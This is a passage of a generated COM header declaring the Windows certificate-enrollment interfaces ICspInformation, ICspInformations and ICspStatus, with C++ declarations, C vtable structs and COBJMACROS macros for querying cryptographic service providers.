#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab307-217d-11da-b2a4-000e7bbb2b09")
    ICspInformation : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeFromName( 
            /* [in] */ __RPC__in BSTR strName) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromType( 
            /* [in] */ X509ProviderType Type,
            /* [in] */ __RPC__in_opt IObjectId *pAlgorithm,
            /* [in] */ VARIANT_BOOL MachineContext) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_CspAlgorithms( 
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithms **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_HasHardwareRandomNumberGenerator( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_IsHardwareDevice( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_IsRemovable( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_IsSoftwareDevice( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Valid( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_MaxKeyContainerNameLength( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Name( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Type( 
            /* [retval][out] */ __RPC__out X509ProviderType *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Version( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_KeySpec( 
            /* [retval][out] */ __RPC__out X509KeySpec *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_IsSmartCard( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetDefaultSecurityDescriptor( 
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_LegacyCsp( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCspStatusFromOperations( 
            /* [in] */ __RPC__in_opt IObjectId *pAlgorithm,
            /* [in] */ AlgorithmOperationFlags Operations,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICspInformationVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICspInformation * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICspInformation * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICspInformation * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICspInformation * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICspInformation * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICspInformation * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICspInformation * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromName )( 
            __RPC__in ICspInformation * This,
            /* [in] */ __RPC__in BSTR strName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromType )( 
            __RPC__in ICspInformation * This,
            /* [in] */ X509ProviderType Type,
            /* [in] */ __RPC__in_opt IObjectId *pAlgorithm,
            /* [in] */ VARIANT_BOOL MachineContext);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspAlgorithms )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithms **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_HasHardwareRandomNumberGenerator )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_IsHardwareDevice )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_IsRemovable )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_IsSoftwareDevice )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Valid )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_MaxKeyContainerNameLength )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Name )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out X509ProviderType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Version )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeySpec )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out X509KeySpec *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_IsSmartCard )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetDefaultSecurityDescriptor )( 
            __RPC__in ICspInformation * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_LegacyCsp )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCspStatusFromOperations )( 
            __RPC__in ICspInformation * This,
            /* [in] */ __RPC__in_opt IObjectId *pAlgorithm,
            /* [in] */ AlgorithmOperationFlags Operations,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue);
        
        END_INTERFACE
    } ICspInformationVtbl;

    interface ICspInformation
    {
        CONST_VTBL struct ICspInformationVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICspInformation_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICspInformation_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICspInformation_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICspInformation_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICspInformation_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICspInformation_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICspInformation_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICspInformation_InitializeFromName(This,strName)	\
    ( (This)->lpVtbl -> InitializeFromName(This,strName) ) 

#define ICspInformation_InitializeFromType(This,Type,pAlgorithm,MachineContext)	\
    ( (This)->lpVtbl -> InitializeFromType(This,Type,pAlgorithm,MachineContext) ) 

#define ICspInformation_get_CspAlgorithms(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspAlgorithms(This,ppValue) ) 

#define ICspInformation_get_HasHardwareRandomNumberGenerator(This,pValue)	\
    ( (This)->lpVtbl -> get_HasHardwareRandomNumberGenerator(This,pValue) ) 

#define ICspInformation_get_IsHardwareDevice(This,pValue)	\
    ( (This)->lpVtbl -> get_IsHardwareDevice(This,pValue) ) 

#define ICspInformation_get_IsRemovable(This,pValue)	\
    ( (This)->lpVtbl -> get_IsRemovable(This,pValue) ) 

#define ICspInformation_get_IsSoftwareDevice(This,pValue)	\
    ( (This)->lpVtbl -> get_IsSoftwareDevice(This,pValue) ) 

#define ICspInformation_get_Valid(This,pValue)	\
    ( (This)->lpVtbl -> get_Valid(This,pValue) ) 

#define ICspInformation_get_MaxKeyContainerNameLength(This,pValue)	\
    ( (This)->lpVtbl -> get_MaxKeyContainerNameLength(This,pValue) ) 

#define ICspInformation_get_Name(This,pValue)	\
    ( (This)->lpVtbl -> get_Name(This,pValue) ) 

#define ICspInformation_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define ICspInformation_get_Version(This,pValue)	\
    ( (This)->lpVtbl -> get_Version(This,pValue) ) 

#define ICspInformation_get_KeySpec(This,pValue)	\
    ( (This)->lpVtbl -> get_KeySpec(This,pValue) ) 

#define ICspInformation_get_IsSmartCard(This,pValue)	\
    ( (This)->lpVtbl -> get_IsSmartCard(This,pValue) ) 

#define ICspInformation_GetDefaultSecurityDescriptor(This,MachineContext,pValue)	\
    ( (This)->lpVtbl -> GetDefaultSecurityDescriptor(This,MachineContext,pValue) ) 

#define ICspInformation_get_LegacyCsp(This,pValue)	\
    ( (This)->lpVtbl -> get_LegacyCsp(This,pValue) ) 

#define ICspInformation_GetCspStatusFromOperations(This,pAlgorithm,Operations,ppValue)	\
    ( (This)->lpVtbl -> GetCspStatusFromOperations(This,pAlgorithm,Operations,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICspInformation_INTERFACE_DEFINED__ */


#ifndef __ICspInformations_INTERFACE_DEFINED__
#define __ICspInformations_INTERFACE_DEFINED__

/* interface ICspInformations */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICspInformations;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab308-217d-11da-b2a4-000e7bbb2b09")
    ICspInformations : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformation **pVal) = 0;
        
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id][custom] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt ICspInformation *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE AddAvailableCsps( void) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByName( 
            /* [in] */ __RPC__in BSTR strName,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformation **ppCspInformation) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE GetCspStatusFromProviderName( 
            /* [in] */ __RPC__in BSTR strProviderName,
            /* [in] */ X509KeySpec LegacyKeySpec,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE GetCspStatusesFromOperations( 
            /* [in] */ AlgorithmOperationFlags Operations,
            /* [in] */ __RPC__in_opt ICspInformation *pCspInformation,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetEncryptionCspAlgorithms( 
            /* [in] */ __RPC__in_opt ICspInformation *pCspInformation,
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithms **ppValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetHashAlgorithms( 
            /* [in] */ __RPC__in_opt ICspInformation *pCspInformation,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICspInformationsVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICspInformations * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICspInformations * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICspInformations * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICspInformations * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICspInformations * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICspInformations * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICspInformations * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in ICspInformations * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformation **pVal);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in ICspInformations * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in ICspInformations * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id][custom] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in ICspInformations * This,
            /* [in] */ __RPC__in_opt ICspInformation *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in ICspInformations * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in ICspInformations * This);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *AddAvailableCsps )( 
            __RPC__in ICspInformations * This);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByName )( 
            __RPC__in ICspInformations * This,
            /* [in] */ __RPC__in BSTR strName,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformation **ppCspInformation);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *GetCspStatusFromProviderName )( 
            __RPC__in ICspInformations * This,
            /* [in] */ __RPC__in BSTR strProviderName,
            /* [in] */ X509KeySpec LegacyKeySpec,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *GetCspStatusesFromOperations )( 
            __RPC__in ICspInformations * This,
            /* [in] */ AlgorithmOperationFlags Operations,
            /* [in] */ __RPC__in_opt ICspInformation *pCspInformation,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetEncryptionCspAlgorithms )( 
            __RPC__in ICspInformations * This,
            /* [in] */ __RPC__in_opt ICspInformation *pCspInformation,
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithms **ppValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetHashAlgorithms )( 
            __RPC__in ICspInformations * This,
            /* [in] */ __RPC__in_opt ICspInformation *pCspInformation,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        END_INTERFACE
    } ICspInformationsVtbl;

    interface ICspInformations
    {
        CONST_VTBL struct ICspInformationsVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICspInformations_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICspInformations_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICspInformations_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICspInformations_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICspInformations_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICspInformations_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICspInformations_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICspInformations_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define ICspInformations_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define ICspInformations_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define ICspInformations_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define ICspInformations_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define ICspInformations_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define ICspInformations_AddAvailableCsps(This)	\
    ( (This)->lpVtbl -> AddAvailableCsps(This) ) 

#define ICspInformations_get_ItemByName(This,strName,ppCspInformation)	\
    ( (This)->lpVtbl -> get_ItemByName(This,strName,ppCspInformation) ) 

#define ICspInformations_GetCspStatusFromProviderName(This,strProviderName,LegacyKeySpec,ppValue)	\
    ( (This)->lpVtbl -> GetCspStatusFromProviderName(This,strProviderName,LegacyKeySpec,ppValue) ) 

#define ICspInformations_GetCspStatusesFromOperations(This,Operations,pCspInformation,ppValue)	\
    ( (This)->lpVtbl -> GetCspStatusesFromOperations(This,Operations,pCspInformation,ppValue) ) 

#define ICspInformations_GetEncryptionCspAlgorithms(This,pCspInformation,ppValue)	\
    ( (This)->lpVtbl -> GetEncryptionCspAlgorithms(This,pCspInformation,ppValue) ) 

#define ICspInformations_GetHashAlgorithms(This,pCspInformation,ppValue)	\
    ( (This)->lpVtbl -> GetHashAlgorithms(This,pCspInformation,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICspInformations_INTERFACE_DEFINED__ */


#ifndef __ICspStatus_INTERFACE_DEFINED__
#define __ICspStatus_INTERFACE_DEFINED__

/* interface ICspStatus */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICspStatus;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab309-217d-11da-b2a4-000e7bbb2b09")
    ICspStatus : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in_opt ICspInformation *pCsp,
            /* [in] */ __RPC__in_opt ICspAlgorithm *pAlgorithm) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Ordinal( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Ordinal( 
            /* [in] */ LONG Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_CspAlgorithm( 
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithm **ppValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_CspInformation( 
            /* [retval][out] */ __RPC__deref_out_opt ICspInformation **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EnrollmentStatus( 
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentStatus **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_DisplayName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICspStatusVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICspStatus * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICspStatus * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICspStatus * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICspStatus * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICspStatus * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICspStatus * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICspStatus * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICspStatus * This,
            /* [in] */ __RPC__in_opt ICspInformation *pCsp,
            /* [in] */ __RPC__in_opt ICspAlgorithm *pAlgorithm);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Ordinal )( 
            __RPC__in ICspStatus * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Ordinal )( 
            __RPC__in ICspStatus * This,
            /* [in] */ LONG Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspAlgorithm )( 
            __RPC__in ICspStatus * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithm **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformation )( 
            __RPC__in ICspStatus * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformation **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentStatus )( 
            __RPC__in ICspStatus * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentStatus **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_DisplayName )( 
            __RPC__in ICspStatus * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } ICspStatusVtbl;

    interface ICspStatus
    {
        CONST_VTBL struct ICspStatusVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICspStatus_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICspStatus_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICspStatus_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICspStatus_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICspStatus_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICspStatus_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICspStatus_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICspStatus_Initialize(This,pCsp,pAlgorithm)	\
    ( (This)->lpVtbl -> Initialize(This,pCsp,pAlgorithm) ) 

#define ICspStatus_get_Ordinal(This,pValue)	\
    ( (This)->lpVtbl -> get_Ordinal(This,pValue) ) 

#define ICspStatus_put_Ordinal(This,Value)	\
    ( (This)->lpVtbl -> put_Ordinal(This,Value) ) 

#define ICspStatus_get_CspAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspAlgorithm(This,ppValue) ) 

#define ICspStatus_get_CspInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformation(This,ppValue) ) 

#define ICspStatus_get_EnrollmentStatus(This,ppValue)	\
    ( (This)->lpVtbl -> get_EnrollmentStatus(This,ppValue) ) 

#define ICspStatus_get_DisplayName(This,pValue)	\
    ( (This)->lpVtbl -> get_DisplayName(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICspStatus_INTERFACE_DEFINED__ */


#ifndef __ICspStatuses_INTERFACE_DEFINED__
#define __ICspStatuses_INTERFACE_DEFINED__

/* interface ICspStatuses */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICspStatuses;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab30a-217d-11da-b2a4-000e7bbb2b09")
